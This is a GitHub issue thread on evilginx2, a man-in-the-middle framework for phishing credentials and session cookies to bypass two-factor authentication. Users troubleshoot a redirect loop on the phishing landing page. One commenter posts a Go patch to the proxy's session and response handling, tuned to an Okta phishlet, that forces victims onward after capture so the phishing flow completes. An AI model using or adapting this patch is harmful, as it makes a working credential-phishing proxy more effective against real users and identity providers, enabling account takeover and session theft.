search

kgretzky / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
BSD 3-Clause "New" or "Revised" License
10.33k stars 1.88k forks source link

**ERR_TOO_MANY_REDIRECTS. #850

Closed Gta0147 closed 1 year ago

Gta0147 commented 1 year ago

ERR_TOO_MANY_REDIRECTS. everything has work except the landing page is not opening

arnaudderison commented 1 year ago

have the same problem ... Have you found a solution?

Andross commented 1 year ago

I had to patch the code to solve this. It appears to be a bug though I am not 100% certain why. My code is hacky af otherwise I would do a PR.

Here is what I did though.

First I added a new variable to the Session object called NumRedirects added in session.go:

In the Session struct on line 7 I added a new variable: NumRedirects int

Note: There is already a RedirectCount variable but this is used elsewhere in the code and was not working for me so I added a new variable so as to not mess with that one.

Then when the Session is initialized on line 25 initialize the NumRedirects variable: NumRedirects: 0,

Then on line 385 on http_proxy.go:

e_host := req.Host
if r_host, ok := p.replaceHostWithOriginal(req.Host); ok {
    if ps.SessionId != "" {
        if s, ok := p.sessions[ps.SessionId]; ok {
            if strings.Contains(req.RequestURI, "/login/login.htm") {
                s.NumRedirects += 1
            }
        }
    }
                    req.Host = r_host
}

Replace "/login/login.htm" with the URL that you are receiving too many redirects on. I used Burp to determine the problematic URL. This URL is related to the Okta phishlet. I am working on a way to provide this in the lure but for now I am hard coding it.

Finally I added some code to the if statement which starts on line 864 return resp around line 888 in the OnResponse function for the proxy add the following (my additions surrounded by **):

            if pl != nil && ps.SessionId != "" {
                s, ok := p.sessions[ps.SessionId]
                if ok && s.IsDone {
                    log.Debug("Redirect Count is %s", s.RedirectCount)
                    if s.RedirectURL != "" && s.RedirectCount == 0 {
                        if stringExists(mime, []string{"text/html"}) {
                            // redirect only if received response content is of `text/html` content type
                            s.RedirectCount += 1
                            log.Important("[%d] redirecting to URL: %s (%d)", ps.Index, s.RedirectURL, s.RedirectCount)
                            resp := goproxy.NewResponse(resp.Request, "text/html", http.StatusFound, "")
                            if resp != nil {
                                r_url, err := url.Parse(s.RedirectURL)
                                if err == nil {
                                    if r_host, ok := p.replaceHostWithPhished(r_url.Host); ok {
                                        r_url.Host = r_host
                                    }
                                    resp.Header.Set("Location", r_url.String())
                                } else {
                                    resp.Header.Set("Location", s.RedirectURL)
                                }
                                return resp
                            }
                        }
                    }
                    **if s.NumRedirects > 4 {
                        resp.Header.Set("Location", s.PhishLure.RedirectUrl)
                        s.NumRedirects = 0

                    }**
                }
            }

Then build that sucker. This code is a little hacky so use with caution.

Support-1535 commented 1 year ago

Hello! If you were already able to resolve your doubts and achieve your goals, close the issue so that we know which ones are pending.

Thank you!